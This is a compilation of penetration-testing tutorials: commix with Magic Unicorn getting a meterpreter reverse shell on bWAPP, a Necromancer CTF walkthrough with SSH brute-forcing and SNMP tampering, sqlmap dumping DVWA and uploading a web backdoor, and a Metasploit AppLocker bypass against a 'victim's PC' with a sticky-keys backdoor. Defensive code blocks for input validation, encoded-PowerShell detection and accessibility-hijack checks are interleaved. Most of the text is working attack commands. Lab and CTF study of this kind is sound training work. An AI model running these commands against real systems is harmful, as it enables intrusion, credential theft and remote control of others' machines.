Powershell Injection Attacks using Commix and Magic Unicorn

Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application. Command injection attacks are possible when an application passes unsafe user-supplied data (forms, cookies, HTTP headers etc.) to a system shell. In this attack, the attacker-supplied operating system commands are usually executed with the privileges of the vulnerable application. Command injection attacks are possible largely due to insufficient input validation.

This attack differs from Code Injection, in that code injection allows the attacker to add his own code that is then executed by the application. In Code Injection, the attacker extends the default functionality of the application without the necessity of executing system commands. Source:

https://www.owasp.org/index.php/Command_Injection
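As an added illustration (not code from this article, from bWAPP or from commix), here is a "ping this host" handler in Python in the shape the bWAPP command-injection pages wrap: first the injectable form that splices the user's value into a shell string, then a hardened form that validates the target and hands the program an argument vector. The function names and the hostname pattern are this example's own assumptions.

```python
"""Added example: a "ping this host" handler like the one the bWAPP pages in
this article wrap, first as the injectable shell-string form and then hardened.
Function names and the hostname pattern are this example's own; none of it
comes from bWAPP or commix.
"""
import ipaddress
import re
import subprocess


def build_ping_command_vulnerable(target: str) -> str:
    """Defective form: the user's value is spliced into a /bin/sh command line.
    A value like "192.168.1.101; id" therefore becomes two shell commands."""
    return "ping -c 1 " + target


# Syntactic hostname check: dot-separated labels of letters, digits and hyphens,
# each label starting and ending with a letter or digit.
_HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?:[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?\.)*"
    r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?$"
)


def validate_target(target: str) -> str:
    """Accept only an IPv4/IPv6 literal or a well-formed hostname; reject
    anything else (shell metacharacters, spaces, a leading '-' that would be
    read as an option by ping)."""
    try:
        return str(ipaddress.ip_address(target))
    except ValueError:
        pass
    if _HOSTNAME_RE.match(target):
        return target
    raise ValueError(f"rejected ping target: {target!r}")


def build_ping_argv(target: str) -> list:
    """Hardened form: an argument vector. With a list and shell=False (the
    default) no shell ever parses the user's bytes, so ';', '|' and '`' are
    just characters inside one argument, and validation rejects even those."""
    return ["ping", "-c", "1", validate_target(target)]


def run_ping(target: str) -> subprocess.CompletedProcess:
    """Run the hardened form; output is captured rather than echoed back."""
    return subprocess.run(build_ping_argv(target), capture_output=True,
                          text=True, timeout=10)
```

The point to take away is that escaping alone is fragile: validation narrows the input to the one shape the feature needs, and the argument vector removes the shell from the picture entirely, so there is nothing left for an injected separator to act on.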

Requirement:

Xampp/Wamp Server

bWAPP Lab

Kali Linux: Burp suite, Commix tool

You need to install the bWAPP lab in your XAMPP or WAMP server; for this, see the article on web pentest lab setup using bWAPP.

Our task is to get a meterpreter shell through OS Command Injection - Blind using bWAPP.

Start the Apache and MySQL services in XAMPP or WAMP. Open the local host address in the browser; I am using 192.168.1.103:81/bWAPP/login.php. Enter the user and password bee and bug respectively.

My task is to bypass all three security levels in bWAPP through OS command injection.

Let's start!

Set the security level to low, choose your bug from the list box, select OS Command Injection - Blind and click on Hack.

Type your IP in the text field and then start Burp Suite in Kali Linux. Don't forget to set the proxy in your browser while using Burp Suite.

To capture the cookie of bWAPP, click on the Proxy tab, then click the Intercept is on button, come back to bWAPP and click the PING button.

Look at the image: you will find that I have got the details.

Open the terminal in Kali Linux and type the commix command.

From the intercepted data in Burp Suite, copy the referer, cookie and target and use them in the following command:

commix --url="http://192.168.1.101:81/bWAPP/commandi_blind.php" --data="target=192.168.1.101&form=submit" --cookie="BEEFHOOK=eZsF6q03quZVSJwV87iaxpRmGI6Z6vIb1ZrNAmXVacVI3lR4jl96sgu418FXxBaMPh1K6rPkyrKT5y9O; security_level=0; PHPSESSID=5m82jlcacsvb2rfmn73gt3egi2"

This command runs the commix tool in the terminal, which automatically performs a command injection attack using the URL and cookie information from bWAPP.

Commix finds that the target seems injectable via blind injection techniques and then asks for a pseudo-terminal.

Type 'y' to resume the classic injection point and get the pseudo-terminal shell.

Here we got the commix OS shell, but our aim is a meterpreter shell. For that we need to type the following commands:

commix(os_shell) > reverse_tcp

commix(reverse_tcp) > set LHOST 192.168.1.101

commix(reverse_tcp) > set LPORT 4444

Commix asks you to choose the backdoor for the connection. Type '2' for other reverse TCP shells.

commix(reverse_tcp) > 2

Commix asks you to set the payload. Type '7' to use a Windows meterpreter reverse TCP shell.

commix(reverse_tcp) > 7

Commix asks you to set the PowerShell injection attack. Type '2' to use TrustedSec's Magic Unicorn.

commix(reverse_tcp) > 2

The above step generates the shellcode marked in the image. Copy the whole command "msfconsole -r /usr/share/commix/src/thirdparty/unicorn/unicorn.rc" and paste it in a new terminal; it starts the multi handler on its own.

Once the Metasploit framework has loaded and started the payload handler, come back to your previous terminal and press Enter, as mentioned in the image.

Luckily, we succeeded in our task: we have got a meterpreter shell.

meterpreter > sysinfo

We are going to perform the same task with the same process, but with another type of vulnerability. Set the security level to low, choose your bug from the list box, select OS Command Injection and click on Hack.

Type your IP in the DNS lookup field, then start Burp Suite and set the manual proxy in your browser. Click on the Proxy tab, then the Intercept is on button, come back to bWAPP and click Lookup.

Open the terminal in Kali Linux and type the commix command.

commix --url="http://192.168.1.101:81/bWAPP/commandi.php" --cookie="BEEFHOOK=eZsF6q03quZVSJwV87iaxpRmGI6Z6vIb1ZrNAmXVacVI3lR4jl96sgu418FXxBaMPh1K6rPkyrKT5y9O; security_level=1; PHPSESSID=79egt1piglgkadfnaa6dujass7" --data="target=192.168.1.101&form=submit"

Type 'y' to resume the classic injection point and get the pseudo-terminal shell.

Here we got the commix OS shell, but our aim is a meterpreter shell. For that we need to type the following commands:

commix(os_shell) > reverse_tcp

commix(reverse_tcp) > set LHOST 192.168.1.101

commix(reverse_tcp) > set LPORT 4444

Commix asks you to choose the backdoor for the connection. Type '2' for other reverse TCP shells.

commix(reverse_tcp) > 2

Commix asks you to set the payload. Type '7' to use a Windows meterpreter reverse TCP shell.

commix(reverse_tcp) > 7

Commix asks you to set the PowerShell injection attack. Type '2' to use TrustedSec's Magic Unicorn.

commix(reverse_tcp) > 2

The above step generates the shellcode marked in the image. Copy the whole command "msfconsole -r /usr/share/commix/src/thirdparty/unicorn/unicorn.rc" and paste it in a new terminal; it starts the multi handler on its own.

Once the Metasploit framework has loaded and started the payload handler, come back to your previous terminal and press Enter, as mentioned in the image.

Luckily, again we succeeded in our task: we have got a meterpreter shell.

meterpreter > sysinfo
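The Magic Unicorn step in both walkthroughs above delivers its stage as a PowerShell command line, which is also exactly what a defender sees in process-creation logging on the target. As an added example (not code from this article, from commix or from Unicorn), the Python below scans constructed process-creation log lines for powershell.exe started with -EncodedCommand or one of its accepted abbreviations, decodes the UTF-16LE base64 argument so an analyst can read what was actually run, and records the -nop and -w switches that usually travel with it. The log line format and the encoded payload are constructed for this example.

```python
"""Added example: spot and decode PowerShell -EncodedCommand invocations in
process-creation log lines. The "EventID=4688 ... CommandLine=..." layout and
the encoded payload are constructed for the example, not taken from any
real log source.
"""
import base64
import re

# Switches that usually accompany an encoded one-liner; names are the full
# PowerShell parameter each abbreviation resolves to.
FLAGS_OF_INTEREST = {
    "-nop": "NoProfile", "-noprofile": "NoProfile",
    "-w": "WindowStyle", "-windowstyle": "WindowStyle",
    "-noni": "NonInteractive", "-noninteractive": "NonInteractive",
    "-ep": "ExecutionPolicy", "-exec": "ExecutionPolicy",
}


def is_encoded_command_switch(token: str) -> bool:
    """PowerShell accepts -ec and any prefix of -EncodedCommand (-e, -en, -enc ...)."""
    if not token.startswith("-") or len(token) < 2:
        return False
    body = token[1:].lower()
    return body == "ec" or "encodedcommand".startswith(body)


def decode_encoded_command(b64: str):
    """The argument is base64 over UTF-16LE text; return None if it is not."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def inspect_command_line(cmdline: str):
    """Return details when cmdline is powershell with an encoded command, else None."""
    tokens = cmdline.split()
    if not tokens or not re.search(r"(?:^|\\)powershell(?:\.exe)?$", tokens[0], re.IGNORECASE):
        return None
    result = {"encoded": None, "decoded": None, "flags": []}
    for i, tok in enumerate(tokens):
        if is_encoded_command_switch(tok) and i + 1 < len(tokens):
            result["encoded"] = tokens[i + 1]
            result["decoded"] = decode_encoded_command(tokens[i + 1])
        elif tok.lower() in FLAGS_OF_INTEREST:
            result["flags"].append(FLAGS_OF_INTEREST[tok.lower()])
    return result if result["encoded"] else None


def scan_process_log(lines):
    """Yield (line number, details) for each process-creation line worth a look."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = re.search(r"CommandLine=(.*)$", line)
        if m:
            details = inspect_command_line(m.group(1))
            if details:
                hits.append((n, details))
    return hits


def sample_log():
    """Constructed log lines; the encoded payload is a harmless Write-Output."""
    payload = "Write-Output 'constructed sample'"
    enc = base64.b64encode(payload.encode("utf-16le")).decode("ascii")
    return [
        "EventID=4688 NewProcessName=C:\\Windows\\explorer.exe CommandLine=explorer.exe",
        "EventID=4688 NewProcessName=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "
        f"CommandLine=powershell -nop -w hidden -enc {enc}",
        "EventID=4688 NewProcessName=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "
        "CommandLine=powershell -File C:\\scripts\\backup.ps1",
    ]
```

Decoding rather than merely flagging matters: an encoded command is not inherently malicious, so the decoded text is what lets an analyst separate a scheduled maintenance script from a downloaded stager. Command-line logging (audit process creation with command line included, or Sysmon) has to be enabled on the host for these lines to exist at all.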

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, Social Media Lover and Gadgets enthusiast.

Hack the Necromancer VM (CTF Challenge)

The Necromancer boot2root box was created for a recent SecTalks Brisbane CTF competition. There are 11 flags to collect on your way to solving the challenge. The end goal is simple: destroy the Necromancer!

You can download Necromancer from here; let's get going. First, we run netdiscover:

netdiscover

Our next step is nmap.

nmap -A -p- 192.168.0.110

The scan takes a bit of time and gives us nothing. So, let's try a UDP scan using nmap.

nmap -sU -T4 -p- 192.168.0.110

We get UDP port 666 open. Let's try netcat on it.

nc -nvu 192.168.0.110 666

No matter how many times we hit Enter, we get the same reply: "You gasp for air! Time is running out!"

When we started the machine (Necromancer), we had a message regarding the IP: "Renewal in 3600 seconds". This seems to be related to the message on our terminal.

Let’s quickly run tcpdump.

tcpdump host 192.168.0.110

We get to know about a gateway on 4444. This could be another port on our target. Let's use netcat once again.

nc -nvlp 4444

And we get a text dump in return. It has capital letters, lowercase letters and numbers as well. This has to be base64-encoded text. We decode it at www.asciitohex.com and get some sensible text.

OK. We have our 1st flag, and a message to chant the flag's string at UDP port 666. The flag1 text seems to be an md5 hash, so we decrypt it at www.hashkiller.co.uk. It decrypts to "opensesame". Let's return to port 666 using netcat and type in this string there.

nc -nvu 192.168.0.110 666

opensesame

Another hint. The numeral 80 reminds us of port 80, used for HTTP. Let's open the victim machine's IP in our browser on port 80.

Nothing useful except an image. Let's download it and try to analyse it using binwalk.

binwalk /root/Desktop/pileoffeathers.jpg

So we discover that the image is actually a zip archive. Let’s rename it.

mv /root/Desktop/pileoffeathers.jpg /root/Desktop/pileoffeathers.zip

Upon unzipping the file we get a txt file named feathers.txt, which again contains base64 text. We decode it and get our 3rd flag along with a clue: /amagicbridgeappearsatthechasm. Seems like a directory.
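To show what binwalk is doing for us in the step above, here is an added example (not from the walkthrough and not binwalk's own code) of a signature scanner that finds a zip archive appended to a JPEG, carves it out, and decodes a base64 member the way the feathers.txt step does. The sample file is built in memory; its member name and contents are constructed for the example.

```python
"""Added example: find and carve a zip archive hidden behind a JPEG header,
the polyglot trick the walkthrough uncovers with binwalk. The sample file,
its member name and its base64 content are constructed, not the CTF's files.
"""
import base64
import io
import zipfile

JPEG_SOI = b"\xff\xd8\xff"         # Start-Of-Image marker that opens every JPEG
ZIP_LOCAL_HEADER = b"PK\x03\x04"  # local file header that begins a zip member
ZIP_EOCD = b"PK\x05\x06"          # end-of-central-directory record closing a zip

SIGNATURES = (
    (JPEG_SOI, "JPEG image data"),
    (ZIP_LOCAL_HEADER, "Zip archive data (local file header)"),
    (ZIP_EOCD, "End of Zip archive"),
)


def build_sample_polyglot() -> bytes:
    """Constructed input: a minimal JPEG-looking prefix with a real zip appended."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        zf.writestr("feathers.txt", "ZmxhZzN7c2FtcGxlfQ==\n")  # base64 of a constructed flag
    fake_jpeg = JPEG_SOI + b"\xe0" + b"\x00\x10JFIF\x00" + b"\x00" * 256  # 267 bytes
    return fake_jpeg + buf.getvalue()


def scan_signatures(data: bytes) -> list:
    """Return sorted (offset, description) pairs for every known magic found,
    which is the table binwalk prints for a file."""
    hits = []
    for magic, description in SIGNATURES:
        start = 0
        while True:
            pos = data.find(magic, start)
            if pos == -1:
                break
            hits.append((pos, description))
            start = pos + 1
    return sorted(hits)


def extract_trailing_zip(data: bytes) -> dict:
    """Carve from the first local header and return {member name: bytes}.
    Slicing at the header makes the archive's internal offsets line up."""
    off = data.find(ZIP_LOCAL_HEADER)
    if off == -1:
        return {}
    with zipfile.ZipFile(io.BytesIO(data[off:])) as zf:
        return {name: zf.read(name) for name in zf.namelist()}


def decode_base64_member(members: dict, name: str) -> str:
    """Decode a text member that holds base64, as feathers.txt did."""
    return base64.b64decode(members[name]).decode("utf-8")
```

Renaming the file to .zip, as the walkthrough does, works because unzip tolerates leading junk before the first header; the carving above is the equivalent for a file whose trailing archive sits behind something less forgiving. A JPEG that also parses as an archive is worth flagging in uploads for the same reason it made a good CTF hiding place.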

Opening the directory in our browser, we are greeted by another web page with seriously no clues this time. It only tells us that we need a magical item that could protect us from the Necromancer's spell. We google for "magic items wiki" and find some good stuff at the very first link. But what next?

We decide to make a custom dictionary with all the words on this wiki page. We will use cewl for this.

cewl https://en.wikipedia.org/wiki/List_of_mythological_objects -d 0 -w /root/Desktop/magicItems.txt -v

This makes a dictionary of magical items on our desktop. Let us try dirb to get our next clue.

dirb http://192.168.0.110/amagicbridgeappearsatthechasm /root/Desktop/magicItems.txt

We get another directory as a result: "talisman".

When we visit the URL with talisman appended, we are asked to download a binary file named talisman.

We download the file and change the permissions of talisman by running

chmod 777 /root/Desktop/talisman

Thereafter we run the file from its location.

./talisman

No matter what we answer to the question "Do you want to wear the talisman?", the result is the same: "Nothing happens". So let's try to debug the binary file.

gdb /root/Desktop/talisman

Get some info about the functions:

info functions

Create a breakpoint at wearTalisman, because after all we want to wear the talisman.

break wearTalisman

run

And then jump to chantToBreakSpell:

jump chantToBreakSpell

Yes! We succeeded in wearing the talisman. We get our 4th flag and a hint to chant the flag's words at UDP port 31337.

Now the words appear to be an md5 hash, and upon decrypting it we get "blackmagic". We now use netcat to connect to port 31337 and type in "blackmagic" there.

nc -unv 192.168.0.110 31337

blackmagic

And we get another directory along with our 5th flag.

We open the directory with our victim's IP.

Another web page with a hint to look at UDP port 161 (used for SNMP), and a close look reveals that the word "necromancer" just before the image is actually a link. Upon clicking it we get another file to download, named "necromancer". We download and unzip it. It contains a cap file named necromancer. Upon analysing this file with Wireshark, we discover that the 802.11 protocol is being used. This indicates that the file is a wireless capture, so let's try to crack the key using aircrack-ng with rockyou.txt as our dictionary.

aircrack-ng /root/Desktop/necromancer.cap -w /usr/share/wordlists/rockyou.txt

This cracks the key as death2all. Use it with port 161, i.e. SNMP.

snmpwalk -c death2all -v 1 192.168.0.110

It says that the door is locked.

Let’s try to unlock it using snmpset.

snmpset -c death2allrw -v 1 192.168.0.110 iso.3.6.1.2.1.1.6.0 s Unlocked

When the string changes to "Unlocked", we run our previous command once again:

snmpwalk -c death2all -v 1 192.168.0.110

Voila! The door unlocks and we get another flag along with a clue, i.e. TCP port 22 (used for SSH): flag7{9e5494108d10bbd5f9e7ae52239546c4} - t22. Another md5 hash, which decrypts to "demonslayer".

We try to log in to port 22 assuming "demonslayer" to be the password, but fail.

ssh 192.168.0.110

demonslayer

This means that "demonslayer" should be the username for SSH. To crack the password, we will use Metasploit along with the rockyou.txt dictionary. Open a terminal for Metasploit.

search ssh_login

Thereafter we run the following commands:

use auxiliary/scanner/ssh/ssh_login

set rhosts 192.168.0.110

set username demonslayer

set pass_file /usr/share/wordlists/rockyou.txt

run

We get the password as 12345678 and a shell as well.

But neither ls nor dir seems to work on this shell.

So, we log in via SSH from a terminal on the host using demonslayer/12345678.

ssh demonslayer@192.168.0.110

12345678

Using ls -la we discover that there is a flag8.txt file in the directory. To read its contents we use

cat flag8.txt

We get another hint regarding UDP port 777. This does not work from our PC, so let us try on the victim's shell.

nc -u localhost 777

and hit Enter twice.

So the Necromancer is now trying to play a game with us. Upon googling his question "Where do the Black Robes practice magic of the Greater Path?", we get the answer: it's Kelewan.

Our 8th flag is here: flag8{55a6af2ca3fee9f2fef81d20743bda2c}, and another question as well, which asks, "Who did Johann Faust VIII make a deal with?" Google tells us the answer to this question is Mephistopheles.

flag9{713587e17e796209d1df4c9c2c2d2966}

And we get the next flag and yet another question: "Who is tricked into passing the Ninth Gate?" Google comes in handy again and tells us the answer once more. The next answer is Hedge.

And our next flag awaits us: flag10{8dc6486d2c63cafcdc6efbba2be98ee4}. Nothing more to be noticed here. But if I am not wrong, we did see this "small vile" thing somewhere earlier. Let's head back with Ctrl+C and try to look for it.

We type in ls -la and yes, it's there: ".smallvile", which we just discovered in the description along with our 10th flag. Let's open it using cat.

cat .smallvile

Hope this opened up some gates, because we don't see any clue here. Let's try sudo.

sudo -l

It seems to be working. It shows us the location of our 11th flag and that the flag11.txt file is not protected by any sort of password. Let's try to open it.

sudo /bin/cat /root/flag11.txt

Woohoo! Mission accomplished. The last flag has been captured.

Researcher and Author: Jitesh Khanna is a passionate Researcher and Technical Writer at Hacking Articles. He is a hacking enthusiast.

 

SQL Injection Exploitation in DVWA (Bypass All Security)

A SQL injection attack consists of insertion or “injection” of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system and in some cases issue commands to the operating system. SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to effect the execution of predefined SQL commands.

Source: www.owasp.org/index.php/SQL_Injection
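As an added example (not code from this article or from DVWA), the Python below models the DVWA "user ID" lookup against an in-memory SQLite table, first with the query built by string concatenation and then parameterised, so the difference the three security levels are really about can be seen directly. The column layout (user_id, first_name, last_name) and the three rows are assumptions that mirror what the walkthrough dumps, not DVWA's actual schema.

```python
"""Added example: the DVWA-style "user ID" lookup written two ways over an
in-memory SQLite database. Table layout and rows are constructed to resemble
the dump in the walkthrough; they are not DVWA's schema or data.
"""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data standing in for the application's users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "admin", "admin"), (2, "Gordon", "Brown"), (3, "Hack", "Me")],
    )
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, user_id: str) -> list:
    """Defective: the request value becomes part of the SQL text, so quotes
    and keywords inside it are parsed as SQL."""
    sql = "SELECT first_name, last_name FROM users WHERE user_id = '" + user_id + "'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn: sqlite3.Connection, user_id: str) -> list:
    """Hardened: the value is bound as a parameter; the SQL text is fixed and
    the database never parses the value, whatever characters it contains."""
    sql = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return conn.execute(sql, (user_id,)).fetchall()


def demo() -> dict:
    """Run both lookups with an ordinary id and with the textbook tautology."""
    conn = make_db()
    ordinary = "2"
    tampered = "2' OR '1'='1"   # closes the quote and appends an always-true clause
    return {
        "vulnerable_ordinary": lookup_vulnerable(conn, ordinary),
        "vulnerable_tampered": lookup_vulnerable(conn, tampered),
        "safe_ordinary": lookup_safe(conn, ordinary),
        "safe_tampered": lookup_safe(conn, tampered),
    }
```

Note that whether the id arrives by GET, by POST or through a session variable, as in DVWA's high level, does not change which of these two functions the value reaches; sqlmap reads the replayed request from a file for the same reason. Parameterisation (or, for an integer id, converting the value with int() before it goes anywhere near the query) is what actually closes the hole.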

Requirement:

Xampp/Wamp Server

DVWA Lab

Kali Linux: Burp suite, sqlmap tool

First you need to install the DVWA lab in your XAMPP or WAMP server; read the full article here.

Now open DVWA on your PC and log in with the following credentials:

Username – admin

Password – password

Bypass Low Level Security

Click on DVWA Security and set the website security level to Low.

From the list of vulnerabilities select SQL Injection for your attack. Type user ID 1 in the text box. Don't click on the submit button without setting the browser proxy. Set your browser proxy to make Burp Suite work properly.

Turn on Burp Suite in Kali Linux, click on Proxy in the menu bar and go for the Intercept is on button. Come back and click on the submit button in the browser. The Intercept button is used to display the HTTP and WebSockets messages that pass between your browser and web servers. Copy the complete detail of the intercept, paste it into leafpad and save it on the desktop as 1.

Open a terminal and type the following command for a SQL injection attack using sqlmap.

sqlmap -r /root/Desktop/1 --dbs -D dvwa --dump-all --os-shell

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection vulnerabilities and taking over database servers. -r loads the HTTP request from a file, so it will analyse your intercepted data from the path /root/Desktop/1.

The thing to notice is that I have used --dbs in the above command, which fetched all the database names, as you can see in the image below. Then it will ask to store hashes in a temporary file; type y and hit Enter.

Next it extracts the table user for the database dvwa, which I mentioned in the above command as -D dvwa.

Great, we have penetrated the user table successfully. Have a look at the fetched data: you will find that it dumps the login ID for each user, failed logins, user first name, user last name and the hashed password.

Table: guestbook for database dvwa, which has only 1 entry.

Now this tool is going to use a web backdoor for the command prompt, where it will ask you to choose the language for the backdoor.

Type 4 and hit enter.

Afterwards it will ask you to choose an option for the location of a writable directory.

Type 1 and hit enter.

You can see the backdoor has been successfully uploaded to the destination folder. Type y to retrieve the command's standard output. Now I am inside the os-shell, which I mentioned in the above command as --os-shell.

os-shell> net users

Bypass Medium Level Security

Click on DVWA Security and set the website security level to Medium.

From the list of vulnerabilities select SQL Injection for your attack. Select user ID 2 from the list. Set the proxy, turn on the Intercept tab in Burp Suite and come back to the web browser to submit.

Follow the same process: save the detail fetched by the intercept on the desktop as file 2.

Now the security level is increased, so I was unable to get an os-shell, but I successfully received all the details of the database by typing the following command in the terminal.

sqlmap -r /root/Desktop/2 --dbs -D dvwa --dump-all

Again I have got all the database names, including dvwa. Now again type y to continue.

Table: user for database dvwa. It has again dumped the same login ID for each user, failed logins, user first name, user last name and hashed password.

Table: guestbook for database dvwa, which has only 1 entry.

Bypass High Level Security

Click on DVWA Security and set the website security level to High.

This is very similar to the low level, however this time the attacker is inputting the value in a different manner. The input values are being transferred to the vulnerable query via session variables using another page, rather than a direct GET request.

Here you find a different scenario when you select SQL Injection. Don't panic; follow the steps carefully, as this level is similar to low level security. As a hint, the developer says that the submitted user ID is redirected to another page through a POST action.

Click on the link "here to change your ID", which redirects to a new window. Type ID 1, turn on intercept, then come back and click on submit.

Now compare the intercepted data of both levels, high and low: you will find that a POST action is used at high security, whereas a GET action is used at the low security level. Copy the complete data and make the following change in it. For help, look at the images below.

Paste the copied data into leafpad, replace POST with GET and add /?id=1&Submit=Submit. Save your file as third on the desktop.

GET /DVWA/vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1

Here go with the flow!

Same process as above, and this time again I will try for an os-shell.

sqlmap -r /root/Desktop/1 --dbs -D dvwa --dump-all --os-shell

Again I have got all the database names, including dvwa. Now again type y to continue.

Table: user for database dvwa. It has again dumped the same login ID for each user, failed logins, user first name, user last name and hashed password.

Table: guestbook for database dvwa, which has only 1 entry.

Oops! Failed to get an os-shell, but we have retrieved the database of dvwa under high security.

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, Social Media Lover and Gadgets enthusiast.

Get Meterpreter Session of Locked PC Remotely (Remote Desktop Enabled)

Let's learn how to take a Meterpreter session of a PC on the network which is switched on but locked, and has the remote desktop feature enabled.

Let us assume that our victim's PC already has the utilman attack or the sticky keys attack enabled on it. To know more about sticky keys, visit https://en.wikipedia.org/wiki/Sticky_keys.

You do not need physical access to the victim's PC for this attack.
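The post assumes the accessibility-feature tampering is already in place, which is also the point at which a defender can catch it before any remote desktop session is ever opened. As an added example (not from the post), the Python below checks a host snapshot for the two common forms of that tampering: an accessibility binary under System32 whose content is identical to cmd.exe, and a cmd.exe "Debugger" registered for it under Image File Execution Options. The snapshot is passed in as plain dictionaries so the check runs offline; the hashes and the IFEO entry in the sample snapshot are constructed, and collecting a real snapshot (hashing the files, reading the registry) is left to the caller.

```python
"""Added example: detect sticky-keys / utilman style tampering from a host
snapshot. All hashes, and the IFEO entry in the sample, are constructed;
nothing here was read from a real machine.
"""
import hashlib

# Binaries reachable from the Windows logon screen through accessibility hotkeys.
ACCESSIBILITY_BINARIES = (
    "sethc.exe", "utilman.exe", "osk.exe", "narrator.exe",
    "magnify.exe", "displayswitch.exe", "atbroker.exe",
)
IFEO_KEY = r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options"


def check_accessibility_hijack(file_hashes: dict, ifeo_debuggers: dict, cmd_hash: str) -> list:
    """file_hashes: {binary name: sha256 of the file under System32}
    ifeo_debuggers: {binary name: value of the Debugger entry under IFEO, if any}
    cmd_hash: sha256 of System32\\cmd.exe on the same host.
    Returns one finding string per suspicious binary."""
    findings = []
    for name in ACCESSIBILITY_BINARIES:
        if file_hashes.get(name) == cmd_hash:
            findings.append(f"{name}: file content identical to cmd.exe (binary swap)")
        debugger = ifeo_debuggers.get(name)
        if debugger:
            findings.append(f"{name}: IFEO Debugger set to {debugger!r} under {IFEO_KEY}")
    return findings


def _fake_hash(label: bytes) -> str:
    """Stand-in for hashing a file on disk; constructed for the example."""
    return hashlib.sha256(label).hexdigest()


def sample_snapshot():
    """Constructed tampered host: sethc.exe swapped for cmd.exe, utilman.exe
    given a cmd.exe debugger. The other binaries are untouched."""
    cmd_hash = _fake_hash(b"cmd.exe contents (constructed)")
    file_hashes = {name: _fake_hash(name.encode()) for name in ACCESSIBILITY_BINARIES}
    file_hashes["sethc.exe"] = cmd_hash
    ifeo_debuggers = {"utilman.exe": r"C:\Windows\System32\cmd.exe"}
    return file_hashes, ifeo_debuggers, cmd_hash


def clean_snapshot():
    """Constructed untampered host for comparison."""
    cmd_hash = _fake_hash(b"cmd.exe contents (constructed)")
    file_hashes = {name: _fake_hash(name.encode()) for name in ACCESSIBILITY_BINARIES}
    return file_hashes, {}, cmd_hash
```

On a real host the file side of the check is stronger when paired with the Authenticode signature of each binary, since a swapped-in cmd.exe still carries a valid Microsoft signature but the wrong original filename; the registry side needs only the Debugger values, which have no legitimate reason to exist for these binaries on a workstation.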

First, run Metasploit on your PC.

$ msfconsole

Thereafter, we search for regsvr32_applocker_bypass_server, use the exploit, set the payload, lhost and lport, and run exploit.

use exploit/windows/misc/regsvr32_applocker_bypass_server

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.0.106

set lport 4444

exploit

Open another terminal to take the remote desktop session of the victim's PC, and enter the victim's IP.

$ rdesktop 192.168.0.103

You get the remote desktop of the victim's PC.

Press the “shift” key 5 times to bring up the command prompt.

Returning to our previous terminal with meterpreter, we have finally got the session of the victim's PC on our terminal.

Author: Jitesh Khanna is a passionate Researcher and Technical Writer at Hacking Articles. He is a hacking enthusiast.
